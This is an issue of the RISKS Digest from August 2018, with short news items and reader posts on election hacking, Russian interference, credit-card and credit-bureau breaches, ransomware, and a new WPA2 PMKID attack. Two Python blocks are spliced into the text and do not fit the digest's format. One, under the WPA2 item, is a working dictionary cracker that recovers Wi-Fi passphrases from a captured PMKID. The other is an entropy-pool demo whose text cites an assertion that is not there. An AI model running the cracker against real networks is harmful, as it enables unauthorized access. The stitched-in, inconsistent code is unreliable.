RISKS Digest 30.79

Wednesday 8 August 2018

The Midterm Elections Are in Serious Danger of Being Hacked, Thanks to Trump

Mother Jones <>

Date: Fri, 3 Aug 2018 18:56:20 -0400

*As President Barack Obama* prepared to leave office, his administration had no doubt that Russia had mounted a devastating disinformation campaign and hacked our electoral systems—and would likely do it again. But President-elect Donald Trump was notably uninterested in the threat. When FBI Director James Comey and other leaders of the intelligence community visited Trump Tower in January 2017 to explain how the country had been attacked, Comey recalled in his memoir, Trump's team had “no questions about what the future Russian threat might be.'' Instead, Comey wrote, they launched “immediately into a strategy session

West Virginia to introduce mobile phone voting for midterm elections

Money.CNN <>

Date: Tue, 7 Aug 2018 19:43:28 -0400

West Virginians serving overseas will be the first in the country to cast federal election ballots using a smartphone app, a move designed to make voting in November's election easier for troops living abroad. But election integrity and computer security experts expressed alarm at the prospect of voting by phone, and one went so far as to call it "a horrific idea." ...

Ballots are anonymized, the company says, and recorded on a public digital ledger called blockchain. Although that technology is most often associated with Bitcoin and other cryptocurrencies, it can be used to record all manner of data.

Oh, it's blockchain-based. OK, then.

[See ... PGN]

Election screw-up

McClatchy <>

Date: Wed, 8 Aug 2018 5:16:09 PDT

"670 ballots in a precinct with 276 voters, and other tales from Georgia's primary"


Vint Cerf <>

Date: Sun, 5 Aug 2018 16:53:53 -0700


"This suggests to me that the notion of traceability under (internationally?) agreed circumstances (that is, differential traceability) might be a fruitful concept to explore. In most societies today, it is accepted that we must be identifiable to appropriate authorities under certain conditions (consider border crossings, traffic violation stops as examples). While there are conditions under which apparent anonymity is desirable and even justifiable (whistle-blowing, for example) absolute anonymity is actually quite difficult to achieve (another point made at the Ditchley workshop) and might not be absolutely desirable given the misbehaviors apparent anonymity invites. I expect this is a controversial conclusion and I look forward to subsequent discussion." Vint Cerf

While I have frequently called for greater accountability in key aspects of Internet operations (in particular, public access to WHOIS domain data except in limited circumstances), I fear that in the general case Vint's Traceability proposal would mostly gladden the hearts of bad governmental players in countries such as China, Russia, and even here in the USA. It basically amounts to an escrowed identity system, a concept that has been widely and appropriately criticized in the encryption arena. Given that a significant degree of anonymity is crucial for human rights advocates and others who live in areas of the world that are routinely under government oppression, I do not see obvious ways that Vint's proposal could be implemented without innocent parties being even more at the mercy of oppressive governments than they are today.

Putin is afraid of one thing ...

Michael Morell <>

Date: Wed, 8 Aug 2018 10:35:20 -0700

Putin is afraid of one thing. Make him think it could happen. Michael Morell, *The Washington Post*, 7 Aug 2018

Facebook revealed on 31 Jul 2018 that it had discovered a 17-month-long influence campaign to sow political divisiveness on its network, an effort that bore the hallmarks of the Kremlin-connected Internet Research Agency. Two days later at the White House, the nation's top national security officials said Russia is conducting a pervasive campaign to weaken our democracy and influence this year's midterm elections. Taken together, these announcements leave no doubt that Russian President Vladimir Putin's political assault on the United States continues unabated.

The most important question the Trump administration and Congress should be asking is: How can we make Putin stop? Finding the answer is essential because what Washington has done so far—some improvements in defending against these attacks, along with a mixture of targeted sanctions against Russia, the indictment of Russian officials and organizations as well as the expulsion of Russian intelligence officers from the United States—has not worked.

Stopping Putin is vital, not just as a matter of protecting American democracy from Russian interference but also because we must signal a stronger deterrence to other adversaries, such as China, Iran and North Korea. Potential aggressors must be shown they will pay a price if they attack. With better resources than Russia for trying to undermine our democracy, China, in particular, needs to know that the United States would respond by imposing a heavy cost.

The U.S. answer to Russia, so far, has been ineffective because Washington has targeted only the entities and individuals actually involved in the Russian information operations. Since the 2016 election, the United States, at various times, has imposed sanctions on at least 10 Russian organizations (some more than once) and at least 23 specific individuals. The sanctions' targeting has had little impact on the Russian economy overall, and the political effect on Putin has been minor.

Here is what the United States needs to do. In terms of self-defense, it must secure the nation's elections system, especially the software that holds data on registered voters. Every vote should be tallied on a backup paper ballot that could be used to verify election results, if necessary. New rules and better enforcement are needed to keep foreign money out of U.S. elections. The federal government should work with individual campaigns to fortify the security of the technology and networks they use. Finally, better coordination across the government is needed to protect U.S. elections, which would probably best be achieved by creating a Hybrid Threats Center similar to the National Counterterrorism Center.


There are several bills in Congress, all with support on both sides of the aisle, that would institute most of these changes and pay for them, but the legislation is frozen by the partisanship this issue stirs.

As for imposing costs on those who attack the United States: Fully implement sanctions already on the books. That is still not happening. But then move beyond targeted sanctions to broad-based sanctions that are designed to hurt the Russian economy—just as the Obama administration's sanctions against Iran were designed to do, as are the Trump administration's. Make it clear to Putin that we would drop the sanctions when he stopped interfering in the democratic institutions of the United States and its allies, some of which are also under siege.

What would such sanctions look like? A Senate bill introduced on 2 Aug 2018, again with sponsors from both parties, is a good start: Prohibit any transaction related to Russian energy projects and bar the purchase of new Russian sovereign debt. Washington should encourage its allies to join in these efforts.

Putin is afraid of one thing. He is afraid that one day the Russian middle class will finally rebel against his regime and rush into the streets demanding change. It happened in Tunis, Cairo and other Middle Eastern and North African cities between 2010 and 2012, and it happened most alarmingly, from Putin's perspective, four years ago in Kiev when Ukrainians threw out a government beholden to Moscow. Sanctions that bite at the heart of the Russian economy—sanctions that increase the risk that Russia's middle class will become restive—will get Putin's attention.

The leaders that the United States has chosen, and the security experts they have appointed and confirmed, are aware of the threat. A failure to defend the nation as well as possible, and failure to impose severe costs on those attacking our democracy, would be seen by history as a major abdication of responsibility. The statements from intelligence officials at the White House last week were an excellent first step. More steps, and stronger ones, are urgently needed.

Michael Morell, a career intelligence officer, served as the deputy director of the Central Intelligence Agency from 2010 to 2013; during that period, he served twice as acting CIA director. He is the host of the Intelligence Matters podcast.

[Edited for RISKS. The original has a slew of subtended URLs. PGN]

FBI charges 3 Ukrainians with hacking U.S. chains, stealing customers' credit card data.

WashPo <>

Date: Thu, 2 Aug 2018 01:42:00 -0400

FBI charges 3 Ukrainians with hacking U.S. chains, stealing customers' credit card data

A group called FIN7 allegedly stole the numbers of an estimated 15 million cards in a long-running scheme.

Old credit-bureau breaches

The New York Times <>

Date: Sun, 5 Aug 2018 17:55:32 -0400

These days I have been reading "Creditworthy: A History of Consumer Surveillance and Financial Identity in America". It is an excellent study of how the credit bureau / data broker industry started in the United States of America.

I was amused by the inclusion of the following news item, which could have been published yesterday:

"Credit File Password Is Stolen", New York Times, June 22nd, 1984.

A password that could permit access to the credit histories of 90 million people was stolen and posted on an electronic bulletin board, TRW Information Systems said yesterday.

[...] TRW, the nation's largest credit reporting company, said its files had been breached by someone who stole a password from a Sears, Roebuck & Company store on the West Coast. The credit company said it changed the password immediately after being told of the breach by an informant two weeks ago.

The password could have been illegally used for a month, at most, and probably a week, said Geri L. Schanz, a TRW spokesman. She said there was no indication that merchandise was illegally charged. A preliminary examination of the Sears account determined no unusual activity; a store is billed each time its password is used and billings have not been higher than normal. Miss Schanz added that the intruders would not have been able to change information on the computer files.

But TRW is conducting an intensive investigation to find out who breached the system and how. Ernest L. Arms, a spokesman for Sears in Chicago, said his company was ''concerned'' about the TRW incident, but he would supply no further details.

Computer experts yesterday said the breach again raises the issue of whether the nation's companies and consumers are adequately protected.

Yes, it definitely raised the issue.


Tech Company Sees Autonomous GA Aircraft

Russ Niles <>

Date: Mon, 6 Aug 2018 13:48:30 -0400

... "plug and play" software that can make most light aircraft fly autonomously. Details on how it works have not been released, but the technology will revolve around "sensing, reasoning and control," according to aviation tech website TransportUP <>. It will also work on helicopters and multicopters, but its designer sees its main benefit as making GA [General Aviation] accessible to the masses. According to XWing founder Marc Piette, the key is getting rid of pilots.[*] “Getting a license and maintaining proficiency even on a single [-engine] aircraft type is time consuming and challenging,'' he said in a post on his website. “Removing the need for a pilot will have a significant impact in opening up the aviation market.''

Piette says that by eliminating pilots more people will be attracted to aircraft ownership and that will increase demand for small planes. The higher volumes will reduce production costs and make GA aircraft more affordable, Piette theorizes. “We see a bright future where people and places are ever more connected, where small aircraft can finally take their rightful place in the transportation landscape, and where autonomous flight will have a profound impact on society as we know it,'' he wrote. Apparently some investors are seeing that bright future as TransportUP is reporting XWing has attracted $4 million in initial investment, including some from Microsoft.

* [NOTE: The purpose of drones is to get rid of pilots and passengers. But someone has to be around to take the `blame' when something goes wrong... PGN]

2 Blasts, a Stampede and a 'Flying Thing': Witnesses Tell of Attack on Maduro

NYTimes <>

Date: Mon, 6 Aug 2018 01:38:14 -0400

A drone attack that failed to kill President Nicolas Maduro of Venezuela unfolded on live TV and in front of many witnesses: “It was like, bang, I had never heard a sound like that in my life.''

An Alaskan borough turns to typewriters and handwriting after its computers were hacked

WashPo <>

Date: Thu, 02 Aug 2018 13:10:02 +0800

Sage advice to adopt for any organization seeking resilience against ransomware opportunism. Paper files stored in filing cabinets and cooked by typewriters are immune from ransomware or DNS tunneling exfiltration, but not fire or black bag ops (breaking & entering + theft).

HP Inkjet Printers Remote CodeEx

HP <>

Date: Tue, 7 Aug 2018 17:07:27 -0400

Two security vulnerabilities have been identified with certain HP Inkjet printers. A maliciously crafted file sent to an affected device can cause a stack or static buffer overflow, which could allow remote code execution.

"German police hacking hit by volley of complaints: Can 'state trojan' law survive?"

ZDnet <>

Date: Wed, 08 Aug 2018 11:05:07 -0700

Germany's use of state-sponsored malware to fight crime is under fire from several sides.

Civil rights activists and politicians will in the coming days launch a volley of constitutional complaints against the German government over its use of state-sponsored malware in criminal investigations.

The first is that the recent law does not respect the boundaries set by the Constitutional Court in a 2008 ruling, which said state-sponsored malware, Staatstrojaner, can only be used to monitor ongoing communications, and not to search people's computers.

The second part of the GFF's argument is that “there is an indirect detrimental effect on IT security as a whole.''

Ulf Buermeyer, the organization's chairman, said: “To use one of these state-sponsored malwares, authorities usually need a security flaw in the system they want to target. These flaws can not only be exploited by German state actors, but also by foreign state actors, or by plain criminals. We argue that trojans are detrimental to our security in general. It creates a strong incentive for state actors in Germany not to disclose security flaws to vendors. We say this is a risk and the German legislature entirely neglected this risk.''

Disney's 'Christopher Robin' Won't Get China Release Amid Pooh Crackdown

Hollywood Reporter <>

Date: Mon, 6 Aug 2018 11:52:13 -0700

A source pins the blame on the country's crusade against images of the Winnie the Pooh character, which has become a symbol of the resistance with foes of the ruling Communist Party, namely Chinese leader Xi Jinping.

China's censorship regime isn't just oppressive and evil, it's utterly insane.

South Korea longs for a train to Europe but U.S. sanctions on North Korea block the way

WashPo <>

Date: Tue, 7 Aug 2018 17:11:54 -0400

The Washington Post, 3 Aug 2018

During their meeting in the peninsula's demilitarized zone in late April, South Korean President Moon Jae-in handed Kim a USB stick containing detailed plans for an inter-Korean rail network. The two Korean leaders agreed to work toward reconnecting their rail network, built under Imperial Japan at the turn of the 20th century, then severed during the Korean War in the 1950s.

Moon better hope Kim doesn't read Risks.

Magical thinking about machine learning won't bring the reality of AI any closer

The Guardian <>

Date: Sun, 5 Aug 2018 19:17:47 +0900

Keeping Zuckerberg Safe Now Costs an Extra $10 Million a Year

Bloomberg <>

Date: Sun, 5 Aug 2018 13:04:43 -0400

Your Company Needs a Digital Ombudsman. Pronto.

Medium <>

Date: Sun, 5 Aug 2018 09:31:23 -0700

via NNSquad

Who Needs this Role? Google famously convened an ethics board to ruminate over the possible dangers A.I. poses for the future. That's admirable from a Let's-Avoid-the-Robopocalypse perspective, but Google needs this position of digital ombudsman to focus on their users' concerns now. (A quick Google search reveals that I'm not the first to suggest it.) Facebook needs this position. So does Twitter. And Snapchat. And Amazon. But the need extends well beyond these obvious digital and social media companies.

One of the best articles I've seen on this topic in ages. And before anyone points it out, yeah, I did notice that it links back to my earlier discussions (updated many times over the years) regarding Google and Ombudsmen, via a link to a Techdirt article that I've previously noted.

To Fight Fake News, SETI Researchers Update Alien-Detection Scale

SciAm <>

Date: Sun, 05 Aug 2018 18:39:39 +0800

SETI has created a new calculator to assess ET's signal to Earth. The calculator uses enumerated input values, with a few range selection options, to characterize the signal structure.

The ET-for-real-calculator can be found here:

An Alaskan borough turns to typewriters and handwriting after its computers were hacked.

WashPo <>

Date: Thu, 2 Aug 2018 01:42:53 -0400

A ransomware attack infected the town's computers and email system, forcing officials to pull them offline.

UK F-35 secrets said leaked after Tinder account hacked

The Times of Israel <>

Date: Mon, 6 Aug 2018 12:22:36 -0400

A British Royal Air Force airwoman had her Tinder dating account hacked, leading to secrets about the country's new F-35 fighter jets being leaked, according to a Sunday report in the UK's Daily Mail <>.

The RAF confirmed to the Mail that some information about the top secret planes was passed on to a third party after the woman's profile was hacked. The perpetrator used her account to strike up an online friendship with another member of the air force.

"New Wi-Fi attack cracks WPA2 passwords with ease"

Charlie Osborne <>

Date: Wed, 08 Aug 2018 11:23:42 -0700

Charlie Osborne for Zero Day, 8 Aug 2018

The common Wi-Fi security standard is no longer as secure as you think.

A new way to compromise the WPA/WPA2 security protocols has been accidentally discovered by a researcher investigating the new WPA3 standard.

The attack technique can be used to compromise WPA/WPA2-secured routers and crack Wi-Fi passwords which have Pairwise Master Key Identifiers (PMKID) features enabled.
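The offline cracking step the article alludes to, as an added example that is not from the article or from the researcher's tooling: it implements the IEEE 802.11i derivations (PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes); PMKID = first 16 bytes of HMAC-SHA1(PMK, "PMK Name" || AP MAC || station MAC)) and runs a dictionary attack against a PMKID. The SSID, MAC addresses, passphrase and wordlist below are constructed for the demo; in a real capture the PMKID comes from the RSN PMKID field of the first EAPOL message the access point sends, which is why no client or completed handshake is needed.

```python
import hashlib
import hmac

# IEEE 802.11i parameters for WPA/WPA2-PSK (these are the standard's values, not assumptions).
PBKDF2_ROUNDS = 4096
PMK_LEN = 32
PMKID_LABEL = b"PMK Name"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32). This is the expensive step
    an attacker pays once per candidate passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), PBKDF2_ROUNDS, PMK_LEN)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC)."""
    return hmac.new(pmk, PMKID_LABEL + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def mac_bytes(mac: str) -> bytes:
    """'02:00:00:00:00:01' -> 6 raw bytes, as they appear in the frame."""
    return bytes.fromhex(mac.replace(":", ""))


def crack_pmkid(pmkid_hex: str, ssid: str, ap_mac: str, sta_mac: str, wordlist):
    """Dictionary attack: derive the PMK for each candidate and compare the resulting
    PMKID with the captured one. Returns the passphrase on success, else None."""
    target = bytes.fromhex(pmkid_hex)
    ap, sta = mac_bytes(ap_mac), mac_bytes(sta_mac)
    for candidate in wordlist:
        if hmac.compare_digest(compute_pmkid(derive_pmk(candidate, ssid), ap, sta), target):
            return candidate
    return None


# Constructed sample "capture" (not real data): the PMKID an AP with this SSID and
# passphrase would place in its first EAPOL frame. Only the AP's and our own MAC
# plus the SSID are needed; no real client ever has to connect.
SSID = "RISKS-Test-AP"
AP_MAC = "02:00:00:00:00:01"
STA_MAC = "02:00:00:00:00:02"
CAPTURED_PMKID = compute_pmkid(
    derive_pmk("correct horse", SSID), mac_bytes(AP_MAC), mac_bytes(STA_MAC)
).hex()

# Constructed wordlist for the demo.
WORDLIST = ["password", "letmein", "RISKS-Test-AP", "correct horse", "hunter2"]


def demo():
    """Run the attack against the constructed capture."""
    return crack_pmkid(CAPTURED_PMKID, SSID, AP_MAC, STA_MAC, WORDLIST)


if __name__ == "__main__":
    print("captured PMKID:", CAPTURED_PMKID)
    print("recovered passphrase:", demo())
```

The cost of the attack is one PBKDF2 derivation per candidate, exactly as with a captured 4-way handshake; what changes is that the attacker only needs one frame from the AP. The practical defences are a long random passphrase (so the dictionary never contains it) or moving to WPA3-SAE, where the password is not used this way.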

How a bunch of lava lamps protect us from hackers

WiReD <>

Date: Tue, 7 Aug 2018 18:39:58 -0400

Edward Craven Walker lived to see his greatest invention, the lava lamp <>, ... cultural comeback. But the British tinkerer (and famed nudist, incidentally) died before he could witness the 21st-century digital potential of his analog creation. Inside the San Francisco office of the web security company Cloudflare <>, ... groovy hardware help protect wide swaths of the Internet from infiltration.

Here's how it works. Every time you log in to any website, you're assigned a unique identification number. It should be random, because if hackers can predict the number, they'll impersonate you. Computers, relying as they do on human-coded patterns, can't generate true randomness—but nobody can predict the goopy mesmeric swirlings of oil, water, and wax. Cloudflare films the lamps 24/7 and uses the ever-changing arrangement of pixels to help create a superpowered cryptographic key. “Anything that the camera captures gets incorporated into the randomness,'' says Nick Sullivan, the company's head of cryptography < includes visitors milling about and light streaming through the windows. (Any change in heat subtly affects the undulations of those glistening globules.)

Sure, *theoretically*, bad guys could sneak their own camera into Cloudflare's lobby to capture the same scene, but the company's prepared for such trickery. It films the movements of a pendulum in its London office and records the measurements of a Geiger counter in Singapore to add more chaos to the equation. Crack that, Russians.
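An added example, not Cloudflare's code and a simplification of how a physical source feeds an operating-system entropy pool: a hash-based pool that absorbs several constructed inputs (the camera frame, pendulum and Geiger readings are made-up byte strings standing in for real measurements) and derives session identifiers from the result. It makes the article's point concrete: an attacker who reproduces the camera's view but not the other sources still cannot predict a token, while hashing inputs the attacker fully knows adds no unpredictability at all.

```python
import hashlib
import hmac


class EntropyPool:
    """Hash-based entropy pool. Every source's bytes are absorbed into a running
    SHA-256 state; the digest of that state keys an HMAC that derives tokens.
    Reproducing any token requires reproducing *every* input, byte for byte."""

    def __init__(self):
        self._state = hashlib.sha256(b"entropy-pool-v1")  # domain-separation prefix (assumption)

    def mix(self, source: str, data: bytes) -> None:
        # Label and length-prefix each contribution so that two short inputs can
        # never be confused with one long input that happens to concatenate them.
        self._state.update(source.encode() + b"\0" + len(data).to_bytes(8, "big") + data)

    def key(self) -> bytes:
        return self._state.digest()

    def session_token(self, counter: int) -> str:
        # HMAC-based derivation: leaking a token does not reveal the pool key,
        # and different counters give independent-looking tokens.
        return hmac.new(self.key(), counter.to_bytes(8, "big"), "sha256").hexdigest()


# Constructed stand-ins for the physical sources (not real measurements).
CAMERA_FRAME = bytes(range(256)) * 4            # what a camera in the lobby might see
PENDULUM = b"\x12\x34\x56\x78" * 8              # London pendulum displacement samples
GEIGER = b"\x00\x03\x01\x00\x02\x00\x00\x05"    # Singapore Geiger counter event counts


def build_pool(camera: bytes, pendulum: bytes, geiger: bytes) -> EntropyPool:
    """Mix all three sources into a fresh pool, in a fixed order."""
    pool = EntropyPool()
    pool.mix("camera", camera)
    pool.mix("pendulum", pendulum)
    pool.mix("geiger", geiger)
    return pool


def attacker_prediction(known_camera: bytes, guessed_pendulum: bytes,
                        guessed_geiger: bytes, counter: int) -> str:
    """What someone who snuck a camera into the lobby can compute: the real frame
    plus guesses for the sources they cannot observe."""
    return build_pool(known_camera, guessed_pendulum, guessed_geiger).session_token(counter)


if __name__ == "__main__":
    real = build_pool(CAMERA_FRAME, PENDULUM, GEIGER).session_token(1)
    guess = attacker_prediction(CAMERA_FRAME, PENDULUM, b"\0" * 8, 1)
    print("server token :", real)
    print("attacker guess:", guess)
    print("match:", real == guess)
```

The design choice worth noticing is that the hash only *combines* unpredictability; it cannot create it. If an attacker knows every input (the last assertion below), the output is fully predictable, which is exactly why Cloudflare adds sources in other cities rather than relying on the lobby camera alone.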

The Information on School Websites Is Not as Safe as You Think

NYTimes <>

Date: Sat, 4 Aug 2018 02:34:09 -0400

Some tracking scripts may be harmless. But others are designed to recognize I.P. addresses and embed cookies that collect information prized by advertisers.

Rich Irony from an "Unwitting" Liar

Henry Baker <>

Date: Sat, 04 Aug 2018 15:24:15 -0700

Is it just me, or is anyone else in computer science annoyed by James Clapper's recent apology book tour, during which he blames everyone but the intelligence community for Hillary Clinton's 30,000 lost emails?

Having been involved in the computer science field for half a century, with a personal email history almost as old, I can recall the heavy hand of the intelligence community in monopolizing encryption technology and criminalizing its export. The intelligence community's watchword: "NOBUS", meaning "NObody But U.S." (may use high-quality encryption and authentication).

This heavy hand made it impossible to incorporate encryption and authentication into the fabric of everyday computer systems, and hence impossible for computers to *routinely* protect ordinary communications like emails.

Only after Bernstein v. United States (1999) and Junger v. Daley (2000) was encryption finally permitted to become a fully integrated component of everyday computer systems.

The computer science community thus lost *forty years* of experience and software development that would have led to email systems capable of storing Hillary's emails securely—even in her home closet.

As the recent "Spectre" class of CPU vulnerabilities demonstrates, we are still living with the legacy of this intelligence community "unwitting" (I prefer "witless") blunder.

I would like to repeat to James Clapper what my grandmother used to say to me when I was a child: "when you point your (index) finger at someone, your other four fingers are pointing at yourself."

I also have a better suggestion for the name of Clapper's book:

"Redacts and Sneers: Half Truths from a Liar in Intelligence"

rather than

"Facts and Fears: Hard Truths from a Life in Intelligence"

Christina Pazzanese, Harvard Staff Writer, 22 Jun 2018: The worries over U.S. intelligence

Former Director of National Intelligence James Clapper says he felt compelled to speak out about President Trump and the investigation into Russia's interference in the 2016 election.

Socially engineering a whale ...

Rob Slade <>

Date: Fri, 3 Aug 2018 12:45:52 -0700

When you know who someone is, have followed their patterns, and know who their friends are, you can get them to respond to phishing messages.

At least, that was the theory when DFO lured an orca away from the harbour where he had taken up residence. (And now someone is going to take issue with "residence," since he was not from one of the resident pods, but was a transient.)

(And, yes, I know that orcas are delphinidae and therefore not true whales ...)

(And, yes, I meant phishing, not fishing.)

(false positive, identification, identity theft, impersonation, phishing, social engineering, social media)

(Oh, you want even more links to security? Well, there is life safety, since transients feed on mammals, and that's what we are ...)

(See also under "bears":

Re: The Ordinary License Plate's Days May Be Numbered

Wol <>

Date: Thu, 2 Aug 2018 19:29:39 +0100

It always amazes me not many countries follow the UK approach, where in normal circumstances the licence plate stays with the vehicle from manufacture to destruction.

And I'm sure plenty of people will scream about the risks of ANPR (automatic number plate recognition) but it works well - mostly - for us where a computer in a police car scans neighbouring plates, then checks them against an online database for tax and insurance. Traders have a special plate which allows them to drive vehicles that are otherwise not registered, taxed or insured.

This does, however, bring another risk into play. So many bills are paid monthly now, including insurance, so if you aren't alert it's far too easy - as happened to my daughter - for the insurance debit to bounce, the insurance company cancels the policy, the ANPR picks up your vehicle, and you get stopped for driving the vehicle without insurance. And the insurance company normally does NOT notify you that the payment bounced! In those circumstances, you are supposed either to re-insure your vehicle, at the roadside, by (smart)phone or the police will seize the vehicle. My daughter was lucky - the police let her proceed when she couldn't contact her insurers but many people have had their vehicle seized and it usually costs about

Re: Employees as subjects in clinical trials

Robert R. Fenichel <>

Date: Wed, 1 Aug 2018 21:14:17 -0400

I'm sorry if I misinterpreted what Dimitri Maziuk said a few issues ago. Other followers of RISKS will need to review the entries and, as they see fit, apportion fault between the transmission & reception functions in our communication.
